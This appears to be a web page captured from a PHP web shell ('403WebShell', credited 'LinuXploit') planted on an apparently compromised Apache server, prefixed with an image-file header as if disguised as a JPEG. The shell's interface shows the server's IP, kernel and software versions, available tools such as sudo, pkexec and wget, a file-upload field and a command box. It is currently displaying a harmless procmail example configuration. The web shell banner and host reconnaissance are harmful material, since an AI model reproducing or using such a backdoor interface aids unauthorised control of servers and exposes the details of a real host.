????JFIF??x?x????'403WebShell
403Webshell
Server IP : 79.136.114.73  /  Your IP : 3.144.28.166
Web Server : Apache/2.4.7 (Ubuntu) PHP/5.5.9-1ubuntu4.29 OpenSSL/1.0.1f
System : Linux b8009 3.13.0-170-generic #220-Ubuntu SMP Thu May 9 12:40:49 UTC 2019 x86_64
User : www-data ( 33)
PHP Version : 5.5.9-1ubuntu4.29
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /usr/share/doc/procmail/examples/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /usr/share/doc/procmail/examples/3procmailrc
# Please check if all the paths in PATH are reachable, remove the ones that
# are not.

PATH=$HOME/bin:/usr/bin:/global/bin:/usr/ucb:/bin:/usr/local/bin:
MAILDIR =	$HOME/Mail	# You'd better make sure it exists
DEFAULT =	$MAILDIR/mbox
LOGFILE =	$MAILDIR/from
LOCKFILE=	$HOME/.lockmail

			# This will create a local lockfile named todd.lock
:0:			# *if* the condition matches
* ^From.*thf
todd

LOCKFILE=$MAILDIR/whatever	# This will remove the global lockfile
				# $HOME/.lockmail and the new lockfile
				# will be $MAILDIR/whatever


				# The next recipe will
				# filter out all messages from "at"
				# jobs and will put them in a terse format
				# (only the date and the body) in
				# a file called $MAILDIR/atjunk
:0 fh
* ^From root
* ^Subject: Output from "at" job
|egrep "^Date:"
				# The next recipe will only be used if
				# the previous one matched
:0 A
atjunk



MAILDIR=$HOME/News	# This will change the current directory


			# The next recipe will create a local lockfile
			# named $HOME/News/dustbin.lock (*if* the condition
			# matches), and will feed the body of the message
			# through `sort` (sorry, couldn't come up with anything
			# better :-), after which the result will be
			# appended to $HOME/News/dustbin
:0 b:
* ^Subject:.*rubbish
|sort >>dustbin

			# The next recipe will use the games directory as a MH
			# folder (of course you need MH to read the mail then)
:0
* ^Subject:.*games
games/.

# Anything not delivered by now will go to $HOME/Mail/mbox
# Using LOCKFILE=$HOME/Mail/mbox.lock

Youez - 2016 - github.com/yon3zu
LinuXploit